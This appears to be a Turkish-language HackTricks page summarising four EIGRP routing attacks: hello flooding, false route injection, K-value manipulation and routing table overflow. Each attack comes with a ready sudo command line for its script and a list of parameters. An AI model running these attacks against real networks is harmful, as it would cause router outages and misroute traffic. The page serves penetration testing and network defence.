EIGRP Attacks
Last updated
Last updated
AWS Hacking'i öğrenin ve uygulayın: HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE) GCP Hacking'i öğrenin ve uygulayın: HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)
Bu, https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9 adresinde açıklanan saldırıların özeti. Daha fazla bilgi için kontrol edin.
Amaç: EIGRP hello paketleri ile yönlendiricilerin CPU'larını aşırı yükleyerek, Hizmet Reddi (DoS) saldırısına neden olabilecek şekilde ağır yük altına sokmak.
Araç: helloflooding.py betiği.
Yürütme: %%%bash ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 %%%
Parametreler:
--interface
: Ağı belirten ağ arabirimi, örn., eth0
.
--as
: EIGRP özerk sistem numarasını tanımlar, örn., 1
.
--subnet
: Alt ağ konumunu ayarlar, örn., 10.10.100.0/24
.
Amaç: Yanlış bir rota enjekte ederek ağ trafiğinin akışını bozmak ve trafiğin var olmayan bir hedefe yönlendirildiği bir kara delik oluşturmak.
Araç: routeinject.py betiği.
Yürütme: %%%bash ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 %%%
Parametreler:
--interface
: Saldırganın sistem arabirimini belirtir.
--as
: EIGRP AS numarasını tanımlar.
--src
: Saldırganın IP adresini ayarlar.
--dst
: Hedef alt ağ IP'sini ayarlar.
--prefix
: Hedef alt ağ IP'sinin maskesini tanımlar.
Amaç: Değiştirilmiş K-değerleri enjekte ederek EIGRP etki alanında sürekli kesintiler ve yeniden bağlantılar oluşturarak etkili bir DoS saldırısına neden olmak.
Araç: relationshipnightmare.py betiği.
Yürütme: %%%bash ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 %%%
Parametreler:
--interface
: Ağı belirten ağ arabirimi.
--as
: EIGRP AS numarasını tanımlar.
--src
: Geçerli bir yönlendiricinin IP adresini ayarlar.
Amaç: Yönlendirme tablosunu sayısız yanlış rotayla doldurarak yönlendiricinin CPU'sunu ve RAM'ini zorlamak.
Araç: routingtableoverflow.py betiği.
Yürütme: %%%bash sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 %%%
Parametreler:
--interface
: Ağı belirten ağ arabirimi.
--as
: EIGRP AS numarasını tanımlar.
--src
: Saldırganın IP adresini ayarlar.
AWS Hacking'i öğrenin ve uygulayın: HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE) GCP Hacking'i öğrenin ve uygulayın: HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)